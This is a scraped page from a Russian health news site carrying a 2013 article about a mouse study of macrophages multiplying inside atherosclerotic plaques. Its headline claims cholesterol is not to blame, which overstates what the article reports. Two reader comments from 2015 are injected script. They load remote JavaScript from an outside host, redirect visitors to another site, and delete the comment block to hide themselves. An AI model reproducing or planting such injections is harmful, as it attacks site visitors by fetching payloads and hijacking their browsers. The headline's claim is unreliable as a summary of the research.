Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новое открытие перевернул...  >>  Новое открытие перевернуло представление об атеросклерозе! Оказывается, холестерин не виноват
 
Обратная связь
 

Новое открытие перевернуло представление об атеросклерозе! Оказывается, холестерин не виноват

Размер шрифта
30 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые из Канады и США объединились, чтобы в деталях изучить атеросклероз – убийцу наших кровеносных сосудов, и пришли к феноменальным выводам.

Новое открытие перевернуло представление об атеросклерозе! Оказывается, холестерин не виноват

Атеросклероз – это заболевание, которое связано с появлением бляшек на стенке артерий. Эти бляшки нарушают нормальный ток крови, что приводит к развитию инфаркта, инсульта и других серьезных заболеваний.

Ранее считалось, что основной причиной развития атеросклероза является высокий уровень холестерина. Но ученые из Университета Торонто (Канада) и Главной Клиники штата Массачусетс (США), объединившись, выяснили, что в тени холестерина скрываются истинные злодеи – белые клетки крови (макрофаги), размножающиеся внутри бляшки.

«Ранее мы полагали, что эти воспалительные макрофаги исходят из кровяного русла, но это была лишь часть правды», – рассказывает Клинт Роббинс, глава исследования. «Мы доказали, что макрофаги не только рекрутируются извне, но и размножаются прямо внутри бляшки!»

Потенциальное влияние этого открытия на стратегию лечения крайне велико. Сейчас фармацевтические компании тратят огромные деньги, силясь найти лекарство, которое могло бы преградить макрофагам путь из крови в бляшку. Но если эти воспалительные клетки прекрасно воспроизводят себя внутри нее, то, возможно, этот подход может оказаться малоэффективным.

«Наша работа, безусловно, дает пищу для размышлений ученым и клиницистам», – утверждает Филип Свирски, ведущий научный сотрудник Главной Клиники Массачусеттса. «Пролиферация (размножение – прим. редакции) макрофагов внутри бляшки в перспективе может стать важной целью для фармакологических препаратов. Этот подход вдвойне выгоден, потому что не затрагивает полезные иммунные функции моноцитов (макрофагов кровяного русла – прим. редакции)».

Кроме того, данная работа заставляет по-новому взглянуть на уже существующую терапию атеросклероза. В частности, статины – препараты, снижающие уровень холестерина крови, – обладают и противовоспалительными свойствами. Возникает закономерный вопрос: снижают ли они интенсивность размножения макрофагов в бляшке? Пока неясно.

Работа проводилась на мышах, поэтому авторы отмечают, что необходимы дальнейшие исследования, чтобы определить, как этот феномен проявляется в человеческом организме.

Следующим шагом американо-канадской группы станет исследование, в котором они попытаются выяснить, зависит ли интенсивность пролиферации макрофагов от стадии атеросклероза и все ли они обладают такой способностью, или же только некоторые популяции.

Но уже сейчас ясно, что в ближайшем будущем многие фундаментальные представления об атеросклерозе будут пересмотрены.

Результаты данного исследования были опубликованы в журнале Nature Medicine.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:02

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:01

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   Одним выстрелом двух зайцев! Обезболивающее лечит диабет   Не психуй! Взрывы гнева увеличивают шансы инфаркта!   Бегом на улицу! Солнце понижает давление!  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 22 июня 2013Грецкие орехи спасут от инфаркта
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
12 причин полюбить шоколад
Зачем спать 10 затем
Что заставит вас храпеть

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.